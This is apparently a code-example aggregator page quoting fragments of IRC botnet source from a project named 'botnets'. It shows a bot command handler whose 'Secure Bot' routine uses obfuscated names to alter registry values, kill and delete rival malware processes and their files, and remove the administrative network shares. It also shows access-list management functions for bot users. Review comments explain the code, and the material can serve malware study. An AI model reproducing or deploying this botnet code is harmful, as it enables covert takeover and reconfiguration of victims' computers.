	else if(!pMsg->sCmd.Compare(m_cmdLongUptime.sName.CStr())) 
	{
		int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); 
		if(!iDays) iDays=7;
		CString sUptime=LongUptime(iDays);
		if(sUptime.Compare("")) {
			g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
				sUptime.Str(), pMsg->sReplyTo.Str());
		}
		return true; 
	}


	// Secure Bot
	// Changes host configuration: one registry value written, several registry
	// values deleted, several processes killed and their files removed from the
	// system directory, then the administrative shares deleted. All names except
	// the OLE key and the "net share" lines are dp()-obfuscated. None of the
	// registry return codes (lRet) are checked.
	else if(!pMsg->sCmd.Compare(m_cmdSecure.sName.CStr())) 
	{	
		#ifdef WIN32
		CString regLoc;
		regLoc = dp(45,15,6,20,23,1,18,5,80,39,9,3,18,15,19,15,6,20,80,49,9,14,4,15,23,19,80,29,21,18,18,5,14,20,48,5,18,19,9,15,14,80,44,21,14,0).CStr();


		// Writes the one-character string "N" to a dp()-named value under the
		// OLE key.
		HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
		strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf);
		LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
		RegSetValueEx(hkey, dp(31,14,1,2,12,5,30,29,41,39,0).CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
		RegCloseKey(hkey);
		
		// The same three steps repeat below for five names: delete a value under
		// regLoc, kill a process, delete <system directory>\<name>.
		// NOTE(review): the variable name tmpBagle suggests these are artifacts
		// of other malware -- inferred from the name only.
		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(45,19,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(9,18,21,14,72,78,5,24,5,0).CStr());
		CString tmpBagle; GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(9,18,21,14,72,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(18,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(),dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(19,19,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(23,9,14,19,25,19,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(23,9,14,19,25,19,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(4,71,4,21,16,4,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(46,1,19,11,39,15,14,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(31,24,16,12,15,18,5,18,0).CStr());
		RegCloseKey(hkey);

		// Plain-text command lines: visible in process-creation logs as
		// "net share ... /delete /y" started by this process.
		system("net share c$ /delete /y");
		system("net share d$ /delete /y");
		system("net share ipc$ /delete /y");
		system("net share admin$ /delete /y");



		#endif
		return true; 
	}

	return false; 
}
示例#29
文件: mac.cpp 项目: hazcod/botnets
/**
 * Removes the user entry named sUsername from luStart and frees it.
 *
 * The whole list is walked; if several entries carry the name, the last one
 * found is the one removed.
 *
 * @param sUsername name to look for (matched where Compare() returns zero)
 * @return true if an entry was removed and deleted, false if none matched or
 *         sUsername has no backing string
 */
bool CMac::DelUser(CString sUsername)
{
	if(sUsername.CStr()==NULL) { return false; }

	user *pMatch=NULL;
	list<user*>::iterator it=luStart.begin();
	while(it!=luStart.end())
	{
		user *pEntry=*it;
		if(pEntry->sUsername.Compare(sUsername)==0) { pMatch=pEntry; }
		++it;
	}

	if(pMatch==NULL) { return false; }

	// Unlink the pointer from the list before releasing the object.
	luStart.remove(pMatch);
	delete pMatch;
	return true;
}
示例#30
文件: mac.cpp 项目: hazcod/botnets
/**
 * Adds deny entries to a user from a ':'-separated list of function names.
 *
 * Tokens are read in order and one heap-allocated func is pushed onto
 * pUser->lDeny per token; reading stops at the first token that compares
 * equal to the empty string.
 *
 * @param sFuncname ':'-separated function names
 * @param pUser     user whose lDeny list receives the entries; ignored if NULL
 */
void CMac::AddBadFunc(CString sFuncname, user *pUser)
{
	if(pUser==NULL || sFuncname.CStr()==NULL) { return; }

	for(int iIndex=0; sFuncname.Token(iIndex, ":").Compare(""); ++iIndex)
	{
		func *pDenied=new func;
		pDenied->sFuncname=sFuncname.Token(iIndex, ":");
		pUser->lDeny.push_back(pDenied);
	}
}